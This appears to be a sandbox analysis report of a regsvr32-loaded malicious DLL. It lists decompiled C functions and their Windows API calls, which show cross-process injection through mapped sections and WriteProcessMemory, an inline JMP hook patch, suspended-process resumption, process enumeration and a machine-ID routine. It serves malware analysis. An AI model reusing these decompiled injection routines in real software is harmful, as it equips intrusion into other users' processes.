                  				_v120.cbWndExtra = 0;
                  				_v120.lpszMenuName = 0;
                  				_v120.cbClsExtra = 0;
                  				_v120.hInstance = 0;
                  				if(RegisterClassExA( &_v120) != 0) {
                  					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
                  					if(_t106 != 0) {
                  						DestroyWindow(_t106); // executed
                  						UnregisterClassA( &_v56, 0);
                  					}
                  				}
                  				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                  					_t126 = _v20;
                  					goto L12;
                  				} else {
                  					_t126 = _v20;
                  					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                  						goto L12;
                  					}
                  					_t140 = E10008669( *0x1001e688, 0x1ac4);
                  					_v32 = _t140;
                  					if(_t140 == 0) {
                  						goto L12;
                  					}
                  					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                  					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
                  					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
                  					E1000861A( &_v32, 0x1ac4);
                  					_t141 =  *0x1001e688; // 0x2bb0590
                  					 *0x1001e688 = _t131;
                  					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                  					E1000C63F(_v12, _v8, _v36);
                  					 *0x1001e688 = _t141;
                  					goto L14;
                  				}
                  			}



























                  APIs
                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                  • RegisterClassExA.USER32 ref: 1000C785
                  • CreateWindowExA.USER32 ref: 1000C7B0
                  • DestroyWindow.USER32 ref: 1000C7BB
                  • UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
                  • NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
                  • VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
                  • WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F
                    • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                  • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
                  • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
                  • NtClose.NTDLL(00000000), ref: 1000C8F5
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
                  • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                  • API String ID: 2002808388-2319545179
                  • Opcode ID: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
                  • Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
                  • Opcode Fuzzy Hash: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
                  • Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 82%
                  			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                  				long _v8;
                  				char _v16;
                  				short _v144;
                  				short _v664;
                  				void* _t19;
                  				struct HINSTANCE__* _t22;
                  				long _t23;
                  				long _t24;
                  				char* _t27;
                  				WCHAR* _t32;
                  				long _t33;
                  				void* _t38;
                  				void* _t49;
                  				struct _SECURITY_ATTRIBUTES* _t53;
                  				void* _t54;
                  				intOrPtr* _t55;
                  				void* _t57;
                  
                  				_t49 = __edx;
                  				OutputDebugStringA("Hello qqq"); // executed
                  				if(_a8 != 1) {
                  					if(_a8 != 0) {
                  						L12:
                  						return 1;
                  					}
                  					SetLastError(0xaa);
                  					L10:
                  					return 0;
                  				}
                  				E100085EF();
                  				_t19 = E1000980C( &_v16);
                  				_t57 = _t49;
                  				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                  					goto L12;
                  				} else {
                  					E10008F78();
                  					GetModuleHandleA(0);
                  					_t22 = _a4;
                  					 *0x1001e69c = _t22;
                  					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                  					_t24 = GetLastError();
                  					if(_t23 != 0 && _t24 != 0x7a) {
                  						memset( &_v144, 0, 0x80);
                  						_t55 = _t54 + 0xc;
                  						_t53 = 0;
                  						do {
                  							_t27 = E100095C7(_t53);
                  							_a8 = _t27;
                  							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                  							E100085C2( &_a8);
                  							_t53 =  &(_t53->nLength);
                  						} while (_t53 < 0x2710);
                  						E10012A5B( *0x1001e69c);
                  						 *_t55 = 0x7c3;
                  						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
                  						 *_t55 = 0xb4e;
                  						_t32 = E100095E1(0x1001ba28);
                  						_a8 = _t32;
                  						_t33 = GetFileAttributesW(_t32); // executed
                  						_push( &_a8);
                  						if(_t33 == 0xffffffff) {
                  							E100085D5();
                  							_v8 = 0;
                  							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
                  							 *0x1001e6a8 = _t38;
                  							if(_t38 == 0) {
                  								goto L10;
                  							}
                  							goto L12;
                  						}
                  						E100085D5();
                  					}
                  					goto L10;
                  				}
                  			}

                  APIs
                  • OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
                  • SetLastError.KERNEL32(000000AA), ref: 100060D7
                    • Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                    • Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                    • Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                  • GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
                  • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
                  • GetLastError.KERNEL32 ref: 10005FEF
                  • memset.MSVCRT ref: 10006013
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
                  • GetFileAttributesW.KERNEL32(00000000), ref: 10006083
                  • CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                  • String ID: Hello qqq
                  • API String ID: 3435743081-3610097158
                  • Opcode ID: 6d402a79815b98af21a7f787fe15b69dd9dc40bdd27b4757cb6b1cb9915066dd
                  • Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
                  • Opcode Fuzzy Hash: 6d402a79815b98af21a7f787fe15b69dd9dc40bdd27b4757cb6b1cb9915066dd
                  • Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
                  • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
                  • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
                  • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
                  • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
                  Memory Dump Source
                  • Source File: 00000005.00000002.497815135.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10077000_regsvr32.jbxd
                  Similarity
                  • API ID: Virtual$Protect$Alloc$Free
                  • String ID:
                  • API String ID: 2574235972-0
                  • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
                  • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 93%
                  			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                  				long _v8;
                  				long _v12;
                  				void* _v16;
                  				intOrPtr _v23;
                  				void _v24;
                  				long _v28;
                  				void* _v568;
                  				void _v744;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				struct HINSTANCE__* _t32;
                  				intOrPtr _t33;
                  				intOrPtr _t35;
                  				void* _t39;
                  				intOrPtr _t43;
                  				void* _t63;
                  				long _t65;
                  				void* _t70;
                  				void** _t73;
                  				void* _t74;
                  
                  				_t73 = __edx;
                  				_t63 = __ecx;
                  				_t74 = 0;
                  				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
                  					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
                  					_t74 = _t39;
                  					if(_t74 != 0) {
                  						memset( &_v744, 0, 0x2cc);
                  						_v744 = 0x10002;
                  						_push( &_v744);
                  						_t43 =  *0x1001e684; // 0x2c2faa0
                  						_push(_t73[1]);
                  						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
                  							_t70 = _v568;
                  							_v12 = _v12 & 0x00000000;
                  							_v24 = 0xe9;
                  							_t65 = 5;
                  							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
                  							_v8 = _t65;
                  							_v16 = _t70;
                  							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
                  								L6:
                  								_t74 = 0;
                  							} else {
                  								_v28 = _v28 & 0x00000000;
                  								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                  									goto L6;
                  								}
                  							}
                  						}
                  					}
                  				}
                  				_t32 =  *0x1001e77c; // 0x0
                  				if(_t32 != 0) {
                  					FreeLibrary(_t32);
                  					 *0x1001e77c =  *0x1001e77c & 0x00000000;
                  				}
                  				_t33 =  *0x1001e784; // 0x0
                  				if(_t33 != 0) {
                  					_t35 =  *0x1001e684; // 0x2c2faa0
                  					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
                  					E1000861A(0x1001e784, 0xfffffffe);
                  				}
                  				return _t74;
                  			}

                  APIs
                    • Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
                    • Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605
                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                    • Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                    • Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
                    • Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
                    • Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
                    • Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                  • memset.MSVCRT ref: 1000CBB8
                  • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                  • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                  • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
                  • String ID:
                  • API String ID: 317994034-0
                  • Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                  • Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
                  • Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                  • Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E1000ABA3(intOrPtr __ecx, void* __edx) {
                  				void* _v304;
                  				void* _v308;
                  				signed int _t14;
                  				signed int _t15;
                  				void* _t22;
                  				intOrPtr _t28;
                  				void* _t31;
                  				intOrPtr _t33;
                  				void* _t40;
                  				void* _t42;
                  
                  				_t33 = __ecx;
                  				_t31 = __edx; // executed
                  				_t14 = CreateToolhelp32Snapshot(2, 0);
                  				_t42 = _t14;
                  				_t15 = _t14 | 0xffffffff;
                  				if(_t42 != _t15) {
                  					memset( &_v304, 0, 0x128);
                  					_v304 = 0x128;
                  					if(Process32First(_t42,  &_v304) != 0) {
                  						while(1) {
                  							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
                  							_t40 = _t22;
                  							if(_t40 == 0) {
                  								break;
                  							}
                  							_t33 =  *0x1001e684; // 0x2c2faa0
                  							if(Process32Next(_t42,  &_v308) != 0) {
                  								continue;
                  							}
                  							break;
                  						}
                  						CloseHandle(_t42);
                  						_t15 = 0 | _t40 == 0x00000000;
                  					} else {
                  						_t28 =  *0x1001e684; // 0x2c2faa0
                  						 *((intOrPtr*)(_t28 + 0x30))(_t42);
                  						_t15 = 0xfffffffe;
                  					}
                  				}
                  				return _t15;
                  			}

                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
                  • memset.MSVCRT ref: 1000ABD6
                  • Process32First.KERNEL32(00000000,?), ref: 1000ABED
                  • Process32Next.KERNEL32(00000000,?), ref: 1000AC21
                  • CloseHandle.KERNEL32(00000000), ref: 1000AC2E
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
                  • String ID:
                  • API String ID: 1267121359-0
                  • Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                  • Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
                  • Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                  • Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E1000B7A8(WCHAR* __ecx, void* __edx) {
                  				long _v8;
                  				long _v12;
                  				WCHAR* _v16;
                  				short _v528;
                  				short _v1040;
                  				short _v1552;
                  				WCHAR* _t27;
                  				signed int _t29;
                  				void* _t33;
                  				long _t38;
                  				WCHAR* _t43;
                  				WCHAR* _t56;
                  
                  				_t44 = __ecx;
                  				_v8 = _v8 & 0x00000000;
                  				_t43 = __edx;
                  				_t56 = __ecx;
                  				memset(__edx, 0, 0x100);
                  				_v12 = 0x100;
                  				GetComputerNameW( &_v528,  &_v12);
                  				lstrcpynW(_t43,  &_v528, 0x100);
                  				_t27 = E100095E1(_t44, 0xa88);
                  				_v16 = _t27;
                  				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                  				asm("sbb eax, eax");
                  				_v8 = _v8 &  ~_t29;
                  				E100085D5( &_v16);
                  				_t33 = E1000C392(_t43);
                  				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                  				lstrcatW(_t43, _t56);
                  				_t38 = E1000C392(_t43);
                  				_v12 = _t38;
                  				CharUpperBuffW(_t43, _t38);
                  				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
                  			}

                  APIs
                  • memset.MSVCRT ref: 1000B7C5
                  • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
                  • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
                  • GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821
                    • Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D
                  • lstrcatW.KERNEL32 ref: 1000B85A
                  • CharUpperBuffW.USER32(?,00000000), ref: 1000B86C
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                  • String ID:
                  • API String ID: 3410906232-0
                  • Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                  • Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
                  • Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                  • Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
                  • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
                  Memory Dump Source
                  • Source File: 00000005.00000002.497767833.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: DirectoryProtectSystemVirtual
                  • String ID:
                  • API String ID: 648172718-0
                  • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
                  • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 314 1000ca25-1000ca45 call 1000c8fd 317 1000cb73-1000cb76 314->317 318 1000ca4b-1000ca6c call 1000a86d 314->318 321 1000ca72-1000ca74 318->321 322 1000cb63-1000cb72 call 1000861a 318->322 323 1000cb51-1000cb61 call 1000861a 321->323 324 1000ca7a 321->324 322->317 323->322 327 1000ca7d-1000ca7f 324->327 330 1000cb42-1000cb4b 327->330 331 1000ca85-1000ca9b call 1000ae66 327->331 330->321 330->323 334 1000cb00-1000cb04 331->334 335 1000ca9d-1000cab0 call 1000cb77 331->335 336 1000cb06-1000cb08 334->336 337 1000cb2f-1000cb3c 334->337 335->334 342 1000cab2-1000caca 335->342 339 1000cb19-1000cb29 336->339 340 1000cb0a-1000cb10 336->340 337->327 337->330 339->337 340->339 342->334 345 1000cacc-1000cae7 GetLastError ResumeThread 342->345 346 1000cae9-1000caf4 345->346 347 1000cafc-1000cafd CloseHandle 345->347 349 1000caf6 346->349 350 1000caf7 346->350 347->334 349->350 350->347
                  C-Code - Quality: 89%
                  			E1000CA25(intOrPtr __edx) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				signed int _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				void* _v36;
                  				char _v40;
                  				char _v80;
                  				char _t37;
                  				intOrPtr _t38;
                  				void* _t45;
                  				intOrPtr _t47;
                  				intOrPtr _t48;
                  				intOrPtr _t50;
                  				intOrPtr _t52;
                  				void* _t54;
                  				intOrPtr _t57;
                  				long _t61;
                  				intOrPtr _t62;
                  				signed int _t65;
                  				signed int _t68;
                  				signed int _t82;
                  				void* _t85;
                  				char _t86;
                  
                  				_v8 = _v8 & 0x00000000;
                  				_v20 = __edx;
                  				_t65 = 0;
                  				_t37 = E1000C8FD( &_v8);
                  				_t86 = _t37;
                  				_v24 = _t86;
                  				_t87 = _t86;
                  				if(_t86 == 0) {
                  					return _t37;
                  				}
                  				_t38 =  *0x1001e688; // 0x2bb0590
                  				_t7 = _t38 + 0xac; // 0x245cdb11
                  				E1000A86D( &_v80,  *_t7 + 7, _t87);
                  				_t82 = _v8;
                  				_t68 = 0;
                  				_v16 = 0;
                  				if(_t82 == 0) {
                  					L20:
                  					E1000861A( &_v24, 0);
                  					return _t65;
                  				}
                  				while(_t65 == 0) {
                  					while(_t65 == 0) {
                  						asm("stosd");
                  						asm("stosd");
                  						asm("stosd");
                  						asm("stosd");
                  						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
                  						_t92 = _t45;
                  						if(_t45 >= 0) {
                  							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
                  							if(_t54 != 0) {
                  								_t57 =  *0x1001e684; // 0x2c2faa0
                  								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
                  								if(_t85 != 0) {
                  									GetLastError();
                  									_t61 = ResumeThread(_v36);
                  									_t62 =  *0x1001e684; // 0x2c2faa0
                  									if(_t61 != 0) {
                  										_push(0xea60);
                  										_push(_t85);
                  										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
                  											_t65 = _t65 + 1;
                  										}
                  										_t62 =  *0x1001e684; // 0x2c2faa0
                  									}
                  									CloseHandle(_t85);
                  								}
                  							}
                  						}
                  						if(_v40 != 0) {
                  							if(_t65 == 0) {
                  								_t52 =  *0x1001e684; // 0x2c2faa0
                  								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
                  							}
                  							_t48 =  *0x1001e684; // 0x2c2faa0
                  							 *((intOrPtr*)(_t48 + 0x30))(_v36);
                  							_t50 =  *0x1001e684; // 0x2c2faa0
                  							 *((intOrPtr*)(_t50 + 0x30))(_v40);
                  						}
                  						_t68 = _v16;
                  						_t47 = _v12 + 1;
                  						_v12 = _t47;
                  						if(_t47 < 2) {
                  							continue;
                  						} else {
                  							break;
                  						}
                  					}
                  					_t82 = _v8;
                  					_t68 = _t68 + 1;
                  					_v16 = _t68;
                  					if(_t68 < _t82) {
                  						continue;
                  					} else {
                  						break;
                  					}
                  					do {
                  						goto L19;
                  					} while (_t82 != 0);
                  					goto L20;
                  				}
                  				L19:
                  				E1000861A(_t86, 0xfffffffe);
                  				_t86 = _t86 + 4;
                  				_t82 = _t82 - 1;
                  			}




























                  APIs
                    • Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
                    • Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                    • Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
                    • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                    • Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                    • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                    • Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                  • GetLastError.KERNEL32(?,00000001), ref: 1000CACC
                  • ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
                  • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
                  • String ID:
                  • API String ID: 1274669455-0
                  • Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                  • Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
                  • Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                  • Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 351 1000b998-1000b9b8 GetTokenInformation 352 1000b9ba-1000b9c3 GetLastError 351->352 353 1000b9fe 351->353 352->353 355 1000b9c5-1000b9d5 call 10008604 352->355 354 1000ba00-1000ba04 353->354 358 1000b9d7-1000b9d9 355->358 359 1000b9db-1000b9ee GetTokenInformation 355->359 358->354 359->353 360 1000b9f0-1000b9fc call 1000861a 359->360 360->358
                  C-Code - Quality: 86%
                  			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                  				long _v8;
                  				void* _v12;
                  				void* _t12;
                  				void* _t20;
                  				void* _t22;
                  				union _TOKEN_INFORMATION_CLASS _t28;
                  				void* _t31;
                  
                  				_push(_t22);
                  				_push(_t22);
                  				_t31 = 0;
                  				_t28 = __edx;
                  				_t20 = _t22;
                  				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                  					L6:
                  					_t12 = _t31;
                  				} else {
                  					_t31 = E10008604(_v8);
                  					_v12 = _t31;
                  					if(_t31 != 0) {
                  						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                  							goto L6;
                  						} else {
